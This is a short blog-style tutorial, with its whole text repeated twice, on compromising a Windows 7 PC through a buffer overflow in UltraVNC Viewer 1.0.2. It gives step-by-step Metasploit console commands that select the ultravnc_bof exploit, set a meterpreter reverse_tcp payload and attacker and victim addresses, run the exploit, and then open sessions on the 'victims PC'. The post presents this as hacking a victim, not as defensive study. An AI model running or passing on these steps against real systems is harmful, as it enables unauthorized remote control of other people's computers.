Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack Exploit Targets
0-Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7 Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Msf# show exploits
Now type use exploit/windows/vnc/ultravnc_bof
Msf exploit (ultravnc_bof) show payloads
Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ultravnc_bof)>set rhost 192.168.1.13 (This must be an address on the local machine)
Msf exploit (ultravnc_bof)>set lhost 192.168.1.12 (IP of Local Host)
Msf exploit (ultravnc_bof)>exploit
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Fonte:
http://bytecode.in/blog/index.php/category/backtrack/buffer-overflow-backtrack/
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack Exploit Targets
0-Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7 Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Msf# show exploits
Now type use exploit/windows/vnc/ultravnc_bof
Msf exploit (ultravnc_bof) show payloads
Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ultravnc_bof)>set rhost 192.168.1.13 (This must be an address on the local machine)
Msf exploit (ultravnc_bof)>set lhost 192.168.1.12 (IP of Local Host)
Msf exploit (ultravnc_bof)>exploit
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Fonte:
http://bytecode.in/blog/index.php/category/backtrack/buffer-overflow-backtrack/
Nenhum comentário:
Postar um comentário